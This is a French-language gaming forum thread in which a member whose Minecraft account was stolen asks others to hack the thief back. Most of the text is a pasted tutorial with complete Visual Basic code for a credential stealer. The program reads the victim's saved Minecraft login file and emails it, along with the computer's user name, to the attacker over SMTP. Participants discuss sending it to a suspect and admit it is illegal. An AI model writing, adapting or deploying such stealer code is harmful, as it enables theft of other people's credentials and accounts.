Irowa
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilSiteDernières imagesRechercherS'enregistrerConnexion
Le Deal du moment : -39%
Pack Home Cinéma Magnat Monitor : Ampli DENON ...
Voir le deal
1190 €

 

 Appel à l'aide/Adieux déchirants

Aller en bas 
5 participants
AuteurMessage
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 9:22

Je vais commencer par le coeur du problème, je me suis fait Hacker mon compte minecraft.
La procédure la plus probable étant que le hacker ait lié mon compte minecraft à un compte mojang à ma place puis ait modifié l'adresse du compte mojang, me rendant incapable de récupérer mon mot de passe grâce à mon adresse mail.

J'aurais bien essayé de contacter le support, mais plus d'un an après avoir effectué la transaction, impossible de retrouver la facture, donc je ne pourrais pas prouver que le compte m'appartient.

Alors je me demandais si une âme charitable avec des connaissances en informatique pouvait essayer de hacker le Hacker si possible et me communiquer les coordonnés ?

Dans le cas échéant, je vous fait mes adieux et je tire ma révérence car je ne vais pas me racheter un compte, tout simplement puisqu'il me faudra bien arrêter minecraft un jour et que voilà une occasion opportune de le faire.

Au fait, tellus, faut que t'enlève les droits à Lanelle, je crois qu'il a Irowa dans ses serveurs et qu'il pourrait venir tout grieffer.

Ce sera tout.
Revenir en haut Aller en bas
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 9:47

Et je me disais, de toute façon, dans 19 jours, on va tous mourir.
Revenir en haut Aller en bas
Tellus
Admin
Tellus


Messages : 2048

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 19:12

Un minecraft, c'est pas très cher. Si ça a pas changé, c'est à peu près le coût mensuel du serveur...

Si je reçois assez de dons (peu probable, j'ai récolté seulement 3 euros depuis 6 mois), je peux m'en servir pour te faire ce cadeau de noël.
Revenir en haut Aller en bas
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 19:30

Non mais c'est pas ça, minecraft me prend trop de temps de toute façon.

Alors bien sûr, si jamais j'ai moyen de le récupérer sans payer, il vaut mieux, mais sinon, tant pis.
Revenir en haut Aller en bas
Atog

Atog


Messages : 1316

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 21:40

Moi je participe.
Revenir en haut Aller en bas
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyDim 2 Déc - 23:11

Non mais non, 20 euros ça me dérange pas, c'est juste que de toute façon, il faudra bien que j'arrête minecraft un jour.

En attendant je spamme sa boite mail avec des messages de récupération de mot de passe.
Revenir en haut Aller en bas
Thor96

Thor96


Messages : 545

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 0:07

Mais non tu vas pas arrêter minecraft comme ça ! C'est trop bête (en plus tu dois me servir d'esclave pendant l'expedition Smile ). Je vais regarder des tutos sur internet pour voir comment hacker un compte minecraft. Je te fais signe si je trouve quelques chose intéressant...

Revenir en haut Aller en bas
Thor96

Thor96


Messages : 545

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 0:26

J'ai trouvé ça sur un site de hacker, ça a pas l'air trop compliqué (suffit de recopier). Je vais tester ça dans dans la semaine et te dire si ça marche.

Comment hacker un compte Minecraft ?

Pour commencer, le compte Minecraft sera obtenue grâce à un .exe que la cible devra exécuter, cela vous enverra un mail avec le fichier qui contient le mot de passe (%appdata%\.minecraft\lastlogin). Vous n'aurez plus qu'à remplacer votre lastlogin par celui que vous obtiendrez grâce au hack. Enjoy!

Première étape:

A l'aide de Microsoft Visual Basic 2010 Express (disponible ici), créer un projet console, [Fichier/Nouveau Projet/Application console]
Vous obtiendrez ceci:
Code :
Module Module1

Sub Main()

End Sub

End Module

Seconde étape:

Il vous faudra importer une bibliothèque permettant d'envoyer le fichier contenant le code par mail.
Ecrivez au dessus de "Module Module1" ceci : "Imports System.Net.Mail"
Code :
Imports System.Net.Mail
Module Module1

Sub Main()

End Sub

End Module

Troisième étape:

Nous allons définir les paramètres d'envoie du mail, pour ceci il vous faudra connaitre le client smtp et le port de votre boite d'envoie d'e-mail.
Vous trouverez tout les clients smtp et port ici.
Insérer en dessous de "Sub Main()" ceci:
Code :
Dim MyMail As MailMessage = New System.Net.Mail.MailMessage

Dim SMTPMail As New SmtpClient("VOTRE_CLIENT_SMTP")
SMTPMail.Credentials = New Net.NetworkCredential("VOTRE_E-MAIL", "VOTRE_MOT_DE_PASSE")
SMTPMail.Port = VOTRE_PORT

SMTPMail.EnableSsl = True
MyMail.Priority = MailPriority.High

Ce qui donne:
Code :
Imports System.Net.Mail
Module Module1

Sub Main()
Dim MyMail As MailMessage = New System.Net.Mail.MailMessage

Dim SMTPMail As New SmtpClient("VOTRE_CLIENT_SMTP")
SMTPMail.Credentials = New Net.NetworkCredential("VOTRE_E-MAIL", "VOTRE_MOT_DE_PASSE")
SMTPMail.Port = VOTRE_PORT

SMTPMail.EnableSsl = True
MyMail.Priority = MailPriority.High

End Sub

End Module

Quatrième étape:

Nous allons finir de définir les paramètre d'envoie du mail. En dessous du code précédent, nous allons dire au programme de qui l'e-mail est envoyé et à qui devra t'il l'envoyer.
La première ligne défini "l'envoyeur" du message (nous):
Code :
MyMail.From = New MailAddress("VOTRE_E-MAIL")

Et la seconde à qui va t'il envoyer l'émail(nous)
Code :
MyMail.To.Add(New MailAddress("VOTRE_E-MAIL"))

Ce qui donne:
Code :
Imports System.Net.Mail
Module Module1

Sub Main()
Dim MyMail As MailMessage = New System.Net.Mail.MailMessage

Dim SMTPMail As New SmtpClient("VOTRE_CLIENT_SMTP")
SMTPMail.Credentials = New Net.NetworkCredential("VOTRE_E-MAIL", "VOTRE_MOT_DE_PASSE")
SMTPMail.Port = VOTRE_PORT

SMTPMail.EnableSsl = True
MyMail.Priority = MailPriority.High

MyMail.From = New MailAddress("VOTRE_E-MAIL")
MyMail.To.Add(New MailAddress("VOTRE_E-MAIL"))

End Sub

End Module

Cinquième étape:

Nous allons dire au programme ce qu'il devra vous envoyer, en l’occurrence le fichier contenant les mot de passe ainsi que le contenu du mail qui vous dira le nom de l'ordinateur que vous venez d'hacker. Copier le code en dessous du code précédent:
Ceci est le contenue du mail (la partie après le "&" sert a trouver le nom de l'ordinateur):
Code :
MyMail.Body = "Hack Minecraft du PC : " & (Environment.UserName)

Ceci est la pièce jointe à envoyer(qui contient le mot de passe):
Code :
Dim mc As New System.Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.A​pplicationData) & "\.minecraft\lastlogin")
MyMail.Attachments.Add(mc)

Ce qui donne:
Code :
Imports System.Net.Mail
Module Module1

Sub Main()
Dim MyMail As MailMessage = New System.Net.Mail.MailMessage

Dim SMTPMail As New SmtpClient("VOTRE_CLIENT_SMTP")
SMTPMail.Credentials = New Net.NetworkCredential("VOTRE_E-MAIL", "VOTRE_MOT_DE_PASSE")
SMTPMail.Port = VOTRE_PORT

SMTPMail.EnableSsl = True
MyMail.Priority = MailPriority.High

MyMail.From = New MailAddress("VOTRE_E-MAIL")
MyMail.To.Add(New MailAddress("VOTRE_E-MAIL"))

MyMail.Body = "Hack Minecraft du PC : " & (Environment.UserName)

Dim mc As New System.Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.A​pplicationData) & "\.minecraft\lastlogin")
MyMail.Attachments.Add(mc)

End Sub

End Module

Sixième étape (et dernière)

Nous allons maintenant indiquer au programme d'envoyer le mail et d’effacer les traces de celui-ci. Pour ceci copier le code en dessous du précédent.
Ceci sert à envoyer le message:
Code :
SMTPMail.Send(MyMail)

Ceci sert à effacer les traces:
Code :
MyMail.To.Clear()
MyMail = Nothing
SMTPMail = Nothing

Et le code complet du programme est:
Code :
Imports System.Net.Mail
Module Module1

Sub Main()
Dim MyMail As MailMessage = New System.Net.Mail.MailMessage

Dim SMTPMail As New SmtpClient("VOTRE_CLIENT_SMTP")
SMTPMail.Credentials = New Net.NetworkCredential("VOTRE_E-MAIL", "VOTRE_MOT_DE_PASSE")
SMTPMail.Port = VOTRE_PORT

SMTPMail.EnableSsl = True
MyMail.Priority = MailPriority.High

MyMail.From = New MailAddress("VOTRE_E-MAIL")
MyMail.To.Add(New MailAddress("VOTRE_E-MAIL"))

MyMail.Body = "Hack Minecraft du PC : " & (Environment.UserName)

Dim mc As New System.Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.A​pplicationData) & "\.minecraft\lastlogin")
MyMail.Attachments.Add(mc)

SMTPMail.Send(MyMail)

MyMail.To.Clear()
MyMail = Nothing
SMTPMail = Nothing

End Sub

End Module

Il ne vous reste plus qu'à compiler votre projet.


Dernière édition par Thor96 le Lun 3 Déc - 0:48, édité 1 fois
Revenir en haut Aller en bas
Atog

Atog


Messages : 1316

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 0:46

(On va delete tout ce topic une fois l'affaire finie parce que c'est pas très légal tout ça.)
Mais t'as le temps d'arrêter minecraft voyons Sad
Revenir en haut Aller en bas
Thor96

Thor96


Messages : 545

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 1:10

En fait je viens de me rendre compte du gros défaut de ce programme : faut l'envoyer à la cible, ce qui inclue de connaitre son adresse mail. Mais atog nous a dit qu'on pouvait pas changer le mail d'un compte minecraft, donc ça devrait pouvoir marcher en l'envoyant à l'adresse mail de Lanelle non ? Je suis pas vraiment sûr, donc si vous avez une réponse.

Et tu as écrit : "j'aurais bien contacté" Tu ne l'as pas fait ? Même sans ta facture je te conseille d'essayer quand même, ils comprendrons surement.
Revenir en haut Aller en bas
Atog

Atog


Messages : 1316

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 2:19

Ils font rien si t'as pas la preuve que c'est ton compte, ce qui est logique.
Revenir en haut Aller en bas
Atog

Atog


Messages : 1316

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 6:21

Sinon on t'en offre une d'office et comme ça tu ne peux pas refuser.
Revenir en haut Aller en bas
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyLun 3 Déc - 6:34

Thor, le hacker n'a pas touché à mon adresse mail, il a simplement lié mon compte minecraft.net (avec mon mot de passe) à un compte mojang.com, ce faisant, il a pu changer l'adresse mojang.com et recevoir à ma place l'e-mail de changement de mot de passe. En conséquence, je n'ai pas son adresse mail, et je n'ai aucun espoir de le retrouver.

Atog, si tu tiens tant que ça à distribuer ton argent, fait donc un ou plusieurs dons à Tellus, il en aura grand besoin et ça lui apportera du réconfort quand il sera à la guerre pour préserver la paix mondiale.

Cependant, mes chers amis minecraftiens, j'entend votre appel désespéré, et je vous ai compris.
A l'heure actuelle, je quémande autour de moi en espérant récupérer un compte minecraft d'un ami qui ne s'en sert plus (son serveur étant rempli de maisons en feuille, en brique et en bouleau).

Vous aurez sous peu des nouvelles du projet.
Revenir en haut Aller en bas
Arhkam

Arhkam


Messages : 920

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyMar 4 Déc - 9:00

Sad
Revenir en haut Aller en bas
Thor96

Thor96


Messages : 545

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyVen 4 Jan - 1:02

Alors ? où en es tu ? tu as réussi à racketter emprunter le compte de quelqu'un d'autre ?
Revenir en haut Aller en bas
Lantern




Messages : 515

Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants EmptyVen 4 Jan - 1:46

Nan, pour l'instant je joue un peu sur le compte de creeper, mais rien de bien constructif.

Je me laisse le temps. Et j'aime me faire désirer.
Revenir en haut Aller en bas
Contenu sponsorisé





Appel à l'aide/Adieux déchirants Empty
MessageSujet: Re: Appel à l'aide/Adieux déchirants   Appel à l'aide/Adieux déchirants Empty

Revenir en haut Aller en bas
 
Appel à l'aide/Adieux déchirants
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Appel aux dons
» Appel à votre générosité
» [Appel d'offre] Route sud
» Appel d'offres : La banque
» Appel d'offres : La Place

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Irowa :: Hors RP :: Discussions générales :: Irowa-
Sauter vers: